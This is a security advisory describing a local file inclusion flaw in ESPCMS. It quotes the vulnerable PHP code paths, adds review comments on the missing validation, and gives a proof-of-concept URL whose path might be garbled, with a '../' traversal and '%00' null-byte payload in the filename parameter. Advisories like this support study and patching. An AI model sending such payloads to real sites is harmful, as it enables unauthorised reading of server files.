ESPCMS Local File Inclusion Vulnerability

2013-04-08T00:00:00
ID SSV:94417
Type seebug
Reporter Root
Modified 2013-04-08T00:00:00

Description

简要描述:

本地文件包含(Local File Inclusion)。

详细说明:

adminsoft/index.php

// Excerpt from adminsoft/index.php as quoted in the advisory: two values
// obtained through indexget() select which controller file is included and
// which method is then invoked on the controller object.
// NOTE(review): indexget() is not shown; the 'R' flag presumably means the
// value is read from the request — confirm against the helper.
$archive = indexget('archive', 'R');
// Falls back to the 'adminuser' controller when no value was supplied.
$archive = empty($archive) ? 'adminuser' : $archive;
$action = indexget('action', 'R');
// Falls back to the 'login' action when no value was supplied.
$action = empty($action) ? 'login' : $action;
// The inclusion happens here (marked by the advisory author).
// NOTE(review): nothing in this excerpt restricts $archive to a fixed set of
// controller names before it is interpolated into the include path. The
// expected guard is an allow-list of known controller names checked before
// the include, so the path can only ever resolve inside control/.
include admin_ROOT . adminfile . "/control/$archive.php";
$control = new important();
// Only methods whose name starts with 'on' can be reached through $action.
$action = 'on' . $action;
if (method_exists($control, $action)) {
    $control->$action();
} else {
    // Unknown action: stop with the product's error message.
    exit('错误:系统方法错误!');
}

// First, look at index.php. The listing line numbers printed by the advisory
// page have been dropped.
/// (unrelated code omitted)
$archive = indexget('ac', 'R'); // ac
$action = indexget('at', 'R'); // at
/// (unrelated code omitted)
if (empty($archive) || empty($action)) {
    // No module or action given: load the default public interface.
    include admin_ROOT . 'interface/public.php';
    $mainlist = new mainpage();
    if (method_exists($mainlist, 'in_index')) {
        $mainlist->in_index();
    } else {
        exit('Access error!');
    }
} else {
    // Enforced allow-list: only these interface names reach the include
    // below, so the front-end index itself no longer has an inclusion issue.
    if (in_array($archive, array('article', 'forum', 'search', 'bbssearch', 'forummain', 'messmain', 'special', 'respond', 'public', 'scriptout', 'enquiry', 'enquirymain', 'form', 'formmain', 'ordermain', 'membermain', 'member', 'forum', 'order'))) {
        $action = 'in_' . $action; // dispatches to an in_<action> method
        if (!file_exists(admin_ROOT . "interface/$archive.php")) { // follow this path
            exit('Access error!');
        }
        include admin_ROOT . "interface/$archive.php";
        $mainlist = new mainpage();
        if (method_exists($mainlist, $action)) {
            $mainlist->$action();
        } else {
            exit('Access error!');
        }
    } else {
        exit('Access error!');
    }
}
/// (unrelated code omitted)

// Follow into the interface/enquity file
/// (unrelated code omitted)
// The filename variable.
// NOTE(review): accept() is not shown; the 'G' flag presumably selects a GET
// parameter — confirm against the helper.
$filename = $this->fun->accept('filename', 'G');
$filename = empty($filename) ? 'list' : $filename;
/// (unrelated code omitted)
// NOTE(review): no validation of $filename is visible between the assignment
// above and this call. Code is omitted in between, so confirm against the
// full file. The value becomes part of the template path passed to fetch().
$output = $this->pagetemplate->fetch($lng . '/lib/' . $filename);
/// (unrelated code omitted)

/// Follow into the function library
// Template loader. The excerpt shows only the start of the function.
function fetch($tpl_file, $cache_fileID = null, $outHTML = null) {
    // When $outHTML is supplied, its result is returned immediately.
    if (!empty($outHTML)) {
        $out = $this->gettemprequire($outHTML);
        return $out;
    }
    require_once 'ectemplates_parser.php';

    // The '.html' suffix is appended only when $this->libfile is set.
    if ($this->libfile) {
        $tpl_file = $this->templatesDIR . $tpl_file . '.html'; // html
    }

    // NOTE(review): $tpl_file is concatenated into the path as-is. No
    // normalisation or rejection of '..' segments is visible in this excerpt.
    $template_file = $this->tpl_dir . $tpl_file;

    $parsed_file = $this->tpl_c_dir . md5($tpl_file) . '.php';

    /// (the advisory's excerpt of fetch() ends here)

// Request given in the advisory, reproduced as published. The path looks
// garbled by the hosting page's URL rewriting.
// http://127.0.0.1/espcms_utf8_5.6.13.03.14_bhttps://images.seebug.org/upload/index.php?ac=scriptout&at=list&tid=1&filename=../../../../index.txt%00
// NOTE(review): the trailing %00 presumably relies on NUL-byte truncation of
// the appended '.html' suffix. PHP 5.3.4 and later reject NUL bytes in
// filesystem paths, but the durable fix is to validate filename against an
// allow-list of template names before it reaches fetch().

漏洞证明:

http://127.0.0.1/espcms_utf8_5.6.13.03.14_bhttps://images.seebug.org/upload/index.php?ac=scriptout&at=list&tid=1&filename=../../../../index.txt%00